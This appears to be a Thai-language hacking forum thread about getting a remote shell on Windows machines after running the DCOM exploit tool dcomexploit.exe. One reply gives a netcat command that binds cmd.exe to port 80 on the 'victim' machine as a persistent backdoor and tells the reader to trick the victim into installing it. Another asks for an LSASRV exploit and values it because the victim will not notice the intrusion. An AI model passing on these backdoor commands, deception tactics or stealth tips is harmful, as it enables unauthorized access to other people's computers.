ผมลองใช้ dcomexploit.exe ในเครื่องที่มีช่องโหว่แต่พอมันบอกให้ ใช้ netcat connect ที่ port 4444 ของเครื่องเป้าหมายพอ ใช้คำสั่งคือ nc xxx.xxx.xxx.xxx 4444 แล้วมันไม่ให้ cmd เครื่องเป้าหมายมา ต้องทำยังไงครับ
ผมลองใช้ dcomexploit.exe ในเครื่องที่มีช่องโหว่แต่พอมันบอกให้ ใช้ netcat connect ที่ port 4444 ของเครื่องเป้าหมายพอ ใช้คำสั่งคือ nc xxx.xxx.xxx.xxx 4444 แล้วมันไม่ให้ cmd เครื่องเป้าหมายมา ต้องทำยังไงครับ
XP Sp1 Sp2 ก็ใช้ไม่ได้แล้วครับ ทาง microsoft ได้อุดช่องโหว่แล้ว
งั้นเราก็เปลี่ยนครับ
ให้เหยื่อเปิดพอร์ตเลยครับ แล้วให้มันโยน CMD กลับมาแทน
โดยให้ที่เครื่องเหยื่อ ใช้ netcat แบบนี้ครับ (หาวิธีหลอกล่อหรือติดตั้งเอาเอง)
nc.exe -L -p 80 -d -e cmd.exe
-L คือให้ listen ที่พอร์ต -p 80 ตลอดเวลา (แอลตัวใหญ่)
ส่วน -d -e cmd.exe คือให้ redirect application ไปที่ cmd ครับผม
ลองไปใช้ดูนะครับ
[SIZE=2]ใครช่างใจร้ายใจดำ ทำกับฉันได้ !!![/SIZE]
งั้นเราก็เปลี่ยนครับ
ให้เหยื่อเปิดพอร์ตเลยครับ แล้วให้มันโยน CMD กลับมาแทน
ผมว่าถ้าเราใช้ nc เปิด port อะไรซักอันอันทิ้งไว้รอการ connect จากเราแล้วเรา connect เข้าไปทาง port ที่เราเปิดไว้อะคับน่าจะได้ เคยทำบนลีนุก แต่วินโดว์ไม่เคย ว่าแต่ผมเข้าใจอะไรผิดป่าวเนี่ย
จริงๆก็มีโปรแกรมอีกตัวที่ชื่อ LSASRV_04011 ตัวนั้นก็ไว้เปิดช่องโหว่ของ lsasrv.dll แล้วค่อยให้มันรับportที่เราระบุไว้ แต่ตอนนี้ผมหาไม่ได้แระ ใครมีก็รบกวนลงให้ด้วยนะครับ^^
P$. ตัวนี้มันจาไม่เหมือนdcomก้คือ ถ้าเราใช้dcomเนี่ย เจ้าตัวจะรู้แน่ๆว่าโดนเจาะ เพราะคอมมันจาทำการรีเครื่องแบบบังคับอ้ะ แต่ถ้าใช้lsasrvมันจาเงียบๆไปเลย ไม่มีสิ่งผิดปกติอ่า^^
<div align="center">------------------------------
<span style="color:#33CCFF">Try everything you think...
Reach everything that you want...
Hope all you need...
Success isn't too hard to acquire...
There's little light shining among the dark place...
Although there's so dark and can't see anything...
Remember this "All of your destiny didn't assigned by anyone..."
------------------------------
[color=#FF0000]***linkเสีย ทำผิดกฎ รบกวนPMมาบอกด้วย....กัวโดนแบนคับบบบบ!!!! ><~~~***[/color]
------------------------------</span></div>
Actions : (View-Readers)
There are no names to display.